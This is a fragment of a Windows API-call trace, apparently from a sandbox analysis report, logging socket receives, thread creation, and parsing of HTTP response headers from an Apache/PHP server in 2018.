s=0x18c, buf=0x57b848*, len=167, flags=0 | out: buf=0x57b848*) returned 167 [0199.061] recv (in: s=0x18c, buf=0x58d9f0, len=4048, flags=0 | out: buf=0x58d9f0*) returned 157 [0199.493] closesocket (s=0x18c) returned 0 Thread: id = 48 os_tid = 0xa90 Thread: id = 49 os_tid = 0xa98 Thread: id = 50 os_tid = 0xa9c [0138.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0138.823] StrStrA (lpFirst="HTTP/1.1 200 OK\r\nDate: Tue, 13 Feb 2018 17:18:00 GMT\r\nServer: Apache\r\nX-Powered-By: PHP/5.6.33\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n", lpSrch="\r\n\r\n") returned="\r\n\r\n" Thread: id = 51 os_tid = 0xaec Thread: id = 52 os_tid = 0xb7c [0199.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0199.496] StrStrA (lpFirst="HTTP/1.1 200 OK\r\nDate: Tue, 13 Feb 2018 17:19:01 GMT\r\nServer: Apache\r\nX-Powered-By: PHP/5.6.33\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n", lpSrch="\r\n\r\n") returned="\r\n\r\n"